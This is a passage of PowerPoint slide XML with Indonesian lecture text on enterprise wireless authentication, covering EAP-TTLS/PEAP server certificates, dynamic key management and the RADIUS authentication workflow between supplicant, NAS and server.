            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedangkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> EAP-TTLS dan PEAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sertifikat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sisi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terowongan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mentransmisikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membantu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memvalidasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keabsahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perusahaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencakup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinamis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>selama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Panggil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Masuk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Otentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Jarak </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> (RADIUS)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Remote Authentication Dial-In User Service (RADIUS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diterbitkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Internet. Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>produk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RADIUS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> NAS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RADIUS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alamat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP server RADIUS dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ingatlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> gateway VPN), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> laptop </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alur </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RADIUS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemohon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sambungan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> NAS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>titik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sakelar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jarak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jauh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>NAS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meminta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. RADIUS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PAP, CHAP, dan EAP. Sebagian </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sekarang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> EAP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> PAP dan CHAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> EAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, NAS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemohon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data EAP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> LAN (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>EAPoL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lainnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Pemohon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>EAPoL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Klien RADIUS </a:t>
            </a:r>
            <a:r>
